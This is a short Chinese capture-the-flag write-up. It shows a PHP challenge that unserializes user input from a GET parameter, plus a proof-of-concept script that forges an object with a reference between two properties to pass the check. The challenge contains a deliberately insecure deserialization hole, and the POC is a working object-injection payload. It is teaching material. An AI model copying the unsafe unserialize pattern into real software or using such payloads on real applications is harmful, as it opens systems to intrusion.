题目如下:
<?php class just4fun { var $enter; var $secret; } if (isset($_GET['pass'])) { $pass = $_GET['pass']; if(get_magic_quotes_gpc()){ $pass=stripslashes($pass); } $o = unserialize($pass); if ($o) { $o->secret = "*"; if ($o->secret === $o->enter) echo "Congratulation! Here is my secret: ".$o->secret; else echo "Oh no... You can't fool me"; } else echo "are you trolling?"; } ?>
主要是涉及了一个PHP对象深浅拷贝,文章:https://www.cnblogs.com/nul1/p/9418080.html
直接构造POC:
1 <?php 2 class just4fun 3 { 4 var $enter; 5 var $secret; 6 7 function __construct() 8 { 9 $this->enter=&$this->secret; 10 } 11 } 12 echo serialize(new just4fun()); 13 14 ?>
第九行的&引用不能少。否则就不行了。
&的概念:
&属于引用,属于浅拷贝,一个改变另外一个也随之改变。
1 <?php 2 $a = "xxoo"; 3 $b = &$a; 4 $b = 'aaaaaa'; 5 echo $a; 6 ?>